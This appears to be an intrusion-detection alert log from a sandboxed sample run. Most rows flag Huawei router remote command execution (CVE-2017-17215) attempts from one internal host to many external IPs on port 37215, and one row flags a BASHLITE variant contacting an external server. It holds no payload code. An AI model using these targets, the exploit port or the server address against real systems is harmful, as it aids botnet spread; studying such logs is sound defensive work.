                                                        06/13/24-21:33:02.910337TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5304837215192.168.2.14156.36.2.26
                                                        06/13/24-21:33:15.253499TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3730237215192.168.2.14197.1.111.87
                                                        06/13/24-21:33:05.016997TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5626237215192.168.2.14156.166.144.206
                                                        06/13/24-21:32:05.350370TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4547237215192.168.2.14197.241.248.226
                                                        06/13/24-21:32:54.726494TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4385037215192.168.2.14156.163.36.234
                                                        06/13/24-21:32:25.990212TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4506437215192.168.2.14156.115.34.251
                                                        06/13/24-21:33:09.125760TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4298437215192.168.2.14156.186.242.123
                                                        06/13/24-21:33:09.127573TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4665437215192.168.2.1441.102.196.129
                                                        06/13/24-21:33:11.158739TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5136037215192.168.2.14156.230.109.34
                                                        06/13/24-21:33:09.130319TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5258637215192.168.2.14197.105.170.32
                                                        06/13/24-21:32:30.093818TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4865437215192.168.2.14156.36.152.112
                                                        06/13/24-21:32:15.608383TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3894837215192.168.2.14197.145.29.42
                                                        06/13/24-21:32:13.545435TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4101237215192.168.2.14156.137.131.155
                                                        06/13/24-21:32:13.568897TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3707637215192.168.2.14197.103.61.210
                                                        06/13/24-21:33:00.869904TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3562237215192.168.2.14197.25.66.44
                                                        06/13/24-21:32:56.756744TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4965637215192.168.2.14197.24.255.197
                                                        06/13/24-21:32:30.076521TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5470237215192.168.2.14197.61.142.243
                                                        06/13/24-21:32:42.419039TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4131237215192.168.2.1441.73.240.42
                                                        06/13/24-21:32:32.153071TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5985437215192.168.2.14156.153.113.69
                                                        06/13/24-21:32:03.277763TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5287037215192.168.2.1441.142.34.29
                                                        06/13/24-21:32:40.359790TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4057837215192.168.2.1441.44.71.135
                                                        06/13/24-21:32:42.405803TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5309237215192.168.2.1441.150.152.120
                                                        06/13/24-21:33:11.156977TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3740437215192.168.2.1441.141.87.91
                                                        06/13/24-21:31:59.176266TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4430037215192.168.2.1441.148.5.11
                                                        06/13/24-21:32:50.633428TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3583837215192.168.2.1441.235.148.210
                                                        06/13/24-21:33:02.952368TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4573037215192.168.2.1441.8.200.10
                                                        06/13/24-21:32:30.095599TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3744637215192.168.2.14197.66.144.200
                                                        06/13/24-21:32:19.728646TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5926837215192.168.2.1441.30.151.218
                                                        06/13/24-21:32:36.244117TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3556037215192.168.2.1441.242.140.148
                                                        06/13/24-21:31:57.132305TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4624637215192.168.2.14156.87.117.200
                                                        06/13/24-21:32:42.407836TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6026437215192.168.2.14156.2.110.234
                                                        06/13/24-21:32:21.787264TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5630837215192.168.2.1441.200.99.235
                                                        06/13/24-21:32:01.223382TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4883437215192.168.2.14156.63.58.63
                                                        06/13/24-21:32:21.783162TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3469437215192.168.2.14156.36.123.19
                                                        06/13/24-21:32:15.605334TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5649237215192.168.2.14156.32.65.133
                                                        06/13/24-21:32:28.023353TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5497237215192.168.2.14156.2.88.154
                                                        06/13/24-21:32:36.241661TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3785037215192.168.2.1441.202.78.191
                                                        06/13/24-21:32:03.305342TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5791437215192.168.2.14197.9.104.150
                                                        06/13/24-21:32:56.754229TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5769437215192.168.2.1441.110.82.50
                                                        06/13/24-21:32:30.098425TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4204837215192.168.2.1441.86.225.249
                                                        06/13/24-21:32:38.300352TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5286437215192.168.2.1441.181.85.156
                                                        06/13/24-21:33:02.908828TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3324237215192.168.2.14156.75.224.225
                                                        06/13/24-21:32:07.416071TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4412837215192.168.2.1441.27.36.92
                                                        06/13/24-21:32:28.048149TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5965837215192.168.2.1441.3.198.63
                                                        06/13/24-21:33:09.106086TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3357437215192.168.2.14156.48.142.226
                                                        06/13/24-21:32:32.164532TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4759637215192.168.2.14156.176.65.102
                                                        06/13/24-21:33:09.085734TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3573237215192.168.2.14197.50.69.122
                                                        06/13/24-21:33:13.231805TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5179237215192.168.2.1441.12.6.127
                                                        06/13/24-21:32:28.027949TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4160237215192.168.2.14197.10.59.145
                                                        06/13/24-21:32:40.354023TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4538437215192.168.2.14156.223.219.241
                                                        06/13/24-21:32:17.670478TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3437637215192.168.2.14156.69.149.252
                                                        06/13/24-21:32:52.654724TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5204637215192.168.2.1441.68.224.182
                                                        06/13/24-21:32:13.546848TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4215637215192.168.2.1441.193.201.148
                                                        06/13/24-21:32:28.045603TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3414637215192.168.2.14197.109.24.113
                                                        06/13/24-21:33:15.256131TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3718837215192.168.2.14156.98.71.206
                                                        06/13/24-21:33:04.986618TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5206637215192.168.2.14156.107.241.64
                                                        06/13/24-21:32:19.728302TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3442237215192.168.2.14156.159.243.54
                                                        06/13/24-21:32:03.309899TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3616637215192.168.2.14197.119.202.20
                                                        06/13/24-21:32:48.556275TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4104237215192.168.2.14197.177.16.206
                                                        06/13/24-21:32:05.347002TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4350837215192.168.2.14156.25.61.31
                                                        06/13/24-21:32:17.671092TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4505837215192.168.2.14156.39.121.15
                                                        06/13/24-21:32:36.262194TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4200637215192.168.2.14156.82.44.17
                                                        06/13/24-21:33:05.012392TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3323837215192.168.2.14156.239.37.30
                                                        06/13/24-21:33:13.213876TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4559237215192.168.2.14197.242.78.103
                                                        06/13/24-21:33:04.989291TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6038437215192.168.2.14156.145.127.206
                                                        06/13/24-21:32:25.974525TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5172437215192.168.2.14197.185.0.96
                                                        06/13/24-21:32:36.264892TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5844637215192.168.2.14197.173.83.234
                                                        06/13/24-21:32:46.525875TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4849437215192.168.2.14156.16.137.203
                                                        06/13/24-21:32:03.275257TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5530237215192.168.2.14156.153.254.119
                                                        06/13/24-21:32:19.726925TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3901437215192.168.2.14156.213.244.80
                                                        06/13/24-21:31:59.200163TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5436637215192.168.2.1441.91.46.56
                                                        06/13/24-21:32:46.525452TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5762837215192.168.2.14197.89.81.27
                                                        06/13/24-21:32:50.613850TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4372637215192.168.2.14197.235.14.170
                                                        06/13/24-21:33:11.160377TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3840637215192.168.2.1441.138.187.58
                                                        06/13/24-21:33:11.177726TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4872437215192.168.2.14197.126.90.22
                                                        06/13/24-21:33:07.059533TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5620637215192.168.2.14156.91.10.54
                                                        06/13/24-21:33:09.090200TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4032037215192.168.2.14197.233.47.100
                                                        06/13/24-21:32:34.196885TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6052237215192.168.2.14156.45.158.211
                                                        06/13/24-21:33:11.174782TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5564037215192.168.2.1441.252.134.139
                                                        06/13/24-21:33:02.914267TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5507837215192.168.2.14197.50.73.137
                                                        06/13/24-21:31:57.154233TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5282237215192.168.2.14156.254.10.207
                                                        06/13/24-21:32:07.418210TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4953437215192.168.2.14197.11.119.198
                                                        06/13/24-21:32:03.310005TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4799237215192.168.2.14156.7.10.202
                                                        06/13/24-21:32:36.263347TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5349437215192.168.2.14197.212.239.205
                                                        06/13/24-21:32:21.782702TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5188637215192.168.2.14156.68.200.155
                                                        06/13/24-21:33:05.011845TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3725637215192.168.2.14197.252.31.98
                                                        06/13/24-21:33:11.158568TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3793637215192.168.2.14156.162.200.185
                                                        06/13/24-21:32:34.214582TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5671237215192.168.2.1441.183.166.118
                                                        06/13/24-21:32:44.455167TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4142237215192.168.2.14156.139.161.16
                                                        06/13/24-21:31:57.136200TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5594637215192.168.2.1441.156.160.87
                                                        06/13/24-21:32:21.806061TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3659837215192.168.2.1441.70.152.31
                                                        06/13/24-21:32:25.975366TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4254037215192.168.2.1441.120.204.169
                                                        06/13/24-21:32:36.266521TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3873437215192.168.2.14156.94.58.57
                                                        06/13/24-21:31:59.198164TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5324837215192.168.2.14197.195.180.119
                                                        06/13/24-21:33:11.181001TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3615837215192.168.2.1441.21.178.141
                                                        06/13/24-21:33:11.172990TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3949637215192.168.2.14156.212.133.198
                                                        06/13/24-21:32:03.308113TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4193237215192.168.2.14156.40.14.206
                                                        06/13/24-21:32:28.027536TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3483237215192.168.2.1441.59.143.221
                                                        06/13/24-21:32:36.263991TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3364437215192.168.2.14156.60.161.89
                                                        06/13/24-21:32:15.611501TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4649237215192.168.2.14156.48.124.6
                                                        06/13/24-21:33:13.214238TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4396437215192.168.2.1441.118.227.120
                                                        06/13/24-21:33:17.304788TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5345037215192.168.2.1441.58.100.16
                                                        06/13/24-21:33:07.040960TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3432437215192.168.2.1441.152.200.240
                                                        06/13/24-21:32:52.678281TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4016637215192.168.2.14156.46.182.6
                                                        06/13/24-21:32:15.611579TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4441837215192.168.2.14197.78.10.45
                                                        06/13/24-21:32:03.308037TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3434637215192.168.2.14156.204.251.70
                                                        06/13/24-21:33:11.159608TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5279037215192.168.2.1441.187.194.122
                                                        06/13/24-21:33:17.305418TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5912237215192.168.2.14197.182.47.190
                                                        06/13/24-21:33:15.255170TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5416637215192.168.2.14156.135.207.154
                                                        06/13/24-21:32:42.421051TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4401037215192.168.2.1441.165.23.199
                                                        06/13/24-21:32:48.570402TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3398237215192.168.2.14156.104.91.23
                                                        06/13/24-21:32:32.171375TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5069437215192.168.2.14156.130.17.167
                                                        06/13/24-21:33:15.277257TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5077437215192.168.2.1441.27.226.119
                                                        06/13/24-21:32:09.458402TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5439437215192.168.2.14197.98.141.69
                                                        06/13/24-21:32:30.123959TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3689037215192.168.2.14197.200.235.6
                                                        06/13/24-21:32:56.753493TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5566637215192.168.2.14197.192.186.147
                                                        06/13/24-21:32:19.754509TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4061037215192.168.2.14197.94.35.228
                                                        06/13/24-21:32:42.418711TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3523037215192.168.2.14156.108.85.1
                                                        06/13/24-21:31:57.092220TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4247437215192.168.2.1441.133.250.50
                                                        06/13/24-21:32:46.502854TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5126237215192.168.2.1441.97.22.143
                                                        06/13/24-21:33:07.056455TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4378437215192.168.2.1441.236.101.3
                                                        06/13/24-21:32:25.978892TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5196837215192.168.2.14197.62.80.194
                                                        06/13/24-21:32:52.655974TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4772237215192.168.2.1441.88.68.153
                                                        06/13/24-21:32:54.708645TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3550237215192.168.2.14156.3.64.42
                                                        06/13/24-21:32:40.357601TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4142637215192.168.2.1441.103.59.233
                                                        06/13/24-21:32:46.525840TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3671037215192.168.2.14156.176.179.117
                                                        06/13/24-21:31:57.092820TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3757637215192.168.2.1441.148.174.163
                                                        06/13/24-21:32:15.607394TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4035437215192.168.2.14197.76.172.135
                                                        06/13/24-21:32:30.100832TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3674237215192.168.2.14156.133.192.2
                                                        06/13/24-21:32:36.269172TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3709237215192.168.2.1441.198.233.179
                                                        06/13/24-21:33:05.014690TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3759237215192.168.2.14197.162.95.214
                                                        06/13/24-21:32:13.567950TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5526437215192.168.2.14197.167.116.171
                                                        06/13/24-21:32:19.752335TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4511437215192.168.2.14197.216.157.199
                                                        06/13/24-21:32:23.834861TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3394837215192.168.2.14156.175.202.149
                                                        06/13/24-21:32:32.165809TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4053837215192.168.2.14156.245.125.42
                                                        06/13/24-21:32:38.320111TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3293037215192.168.2.14156.241.228.36
                                                        06/13/24-21:32:46.524874TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4579037215192.168.2.1441.135.37.66
                                                        06/13/24-21:32:01.218708TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4645437215192.168.2.14197.202.165.217
                                                        06/13/24-21:33:13.212717TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5922437215192.168.2.1441.0.65.255
                                                        06/13/24-21:32:17.671711TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3777437215192.168.2.14197.122.43.106
                                                        06/13/24-21:32:15.610874TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3702837215192.168.2.14156.106.147.73
                                                        06/13/24-21:32:07.417810TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4950037215192.168.2.14197.86.156.195
                                                        06/13/24-21:32:52.671110TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6032637215192.168.2.1441.235.73.84
                                                        06/13/24-21:32:03.279322TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4114037215192.168.2.1441.222.216.67
                                                        06/13/24-21:32:36.265591TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3287837215192.168.2.14156.178.92.34
                                                        06/13/24-21:32:54.724647TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5747237215192.168.2.14197.13.247.247
                                                        06/13/24-21:32:46.504073TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3664037215192.168.2.14156.92.85.78
                                                        06/13/24-21:32:54.707745TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4286437215192.168.2.14197.165.217.11
                                                        06/13/24-21:32:34.195689TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5828437215192.168.2.14156.222.64.35
                                                        06/13/24-21:32:21.800691TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3848037215192.168.2.14156.171.253.133
                                                        06/13/24-21:33:07.040291TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4140237215192.168.2.14156.159.212.194
                                                        06/13/24-21:32:05.344807TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5119237215192.168.2.1441.155.73.110
                                                        06/13/24-21:33:15.272402TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3881637215192.168.2.14156.6.35.242
                                                        06/13/24-21:32:32.167136TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4290437215192.168.2.14156.106.44.178
                                                        06/13/24-21:33:09.111621TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5015837215192.168.2.14197.201.44.97
                                                        06/13/24-21:32:13.564887TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4341437215192.168.2.14156.136.78.121
                                                        06/13/24-21:33:17.308164TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4016037215192.168.2.1441.212.248.159
                                                        06/13/24-21:32:23.834961TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4212437215192.168.2.1441.45.250.158
                                                        06/13/24-21:33:02.936656TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4296237215192.168.2.14197.176.152.134
                                                        06/13/24-21:32:17.694078TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4031437215192.168.2.1441.87.73.37
                                                        06/13/24-21:32:40.357343TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3792237215192.168.2.1441.30.65.126
                                                        06/13/24-21:33:13.212771TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5932637215192.168.2.14156.218.101.177
                                                        06/13/24-21:32:34.199515TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5407437215192.168.2.14197.114.141.225
                                                        06/13/24-21:32:44.450891TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4363437215192.168.2.14197.241.17.173
                                                        06/13/24-21:33:09.111471TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5850037215192.168.2.14156.18.176.220
                                                        06/13/24-21:33:11.156047TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5028637215192.168.2.14156.247.106.172
                                                        06/13/24-21:32:25.992194TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4144637215192.168.2.1441.144.203.227
                                                        06/13/24-21:31:59.176037TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5101437215192.168.2.1441.62.90.19
                                                        06/13/24-21:33:16.011815TCP2840515ETPRO TROJAN ELF/BASHLITE Variant Reporting Arch Type (i586)487204554192.168.2.14103.82.38.94
                                                        06/13/24-21:31:59.197408TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5186237215192.168.2.14197.36.55.1
                                                        06/13/24-21:33:07.060727TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6006237215192.168.2.14156.230.66.147
                                                        06/13/24-21:32:19.729470TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3865437215192.168.2.1441.69.69.47
                                                        06/13/24-21:32:30.095725TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3593237215192.168.2.1441.107.85.147
                                                        06/13/24-21:32:25.973515TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4808637215192.168.2.1441.152.253.0
                                                        06/13/24-21:32:05.349980TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3621637215192.168.2.14156.135.77.146
                                                        06/13/24-21:32:05.348501TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4802637215192.168.2.14156.146.251.137
                                                        06/13/24-21:33:15.257045TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5016037215192.168.2.14197.238.212.32
                                                        06/13/24-21:32:32.170411TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4619037215192.168.2.14156.75.3.179
                                                        06/13/24-21:32:11.488903TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4701637215192.168.2.14197.191.173.171
                                                        06/13/24-21:32:38.300249TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5990237215192.168.2.14197.129.152.185
                                                        06/13/24-21:32:19.753286TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4080837215192.168.2.14156.23.144.109
                                                        06/13/24-21:32:46.524341TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4837237215192.168.2.1441.86.2.91
                                                        06/13/24-21:32:01.237807TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5079837215192.168.2.1441.206.170.161
                                                        06/13/24-21:32:09.456989TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4910837215192.168.2.14197.52.24.0
                                                        06/13/24-21:33:09.106427TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3466637215192.168.2.14197.156.117.164
                                                        06/13/24-21:32:25.978833TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4128837215192.168.2.14197.139.143.11
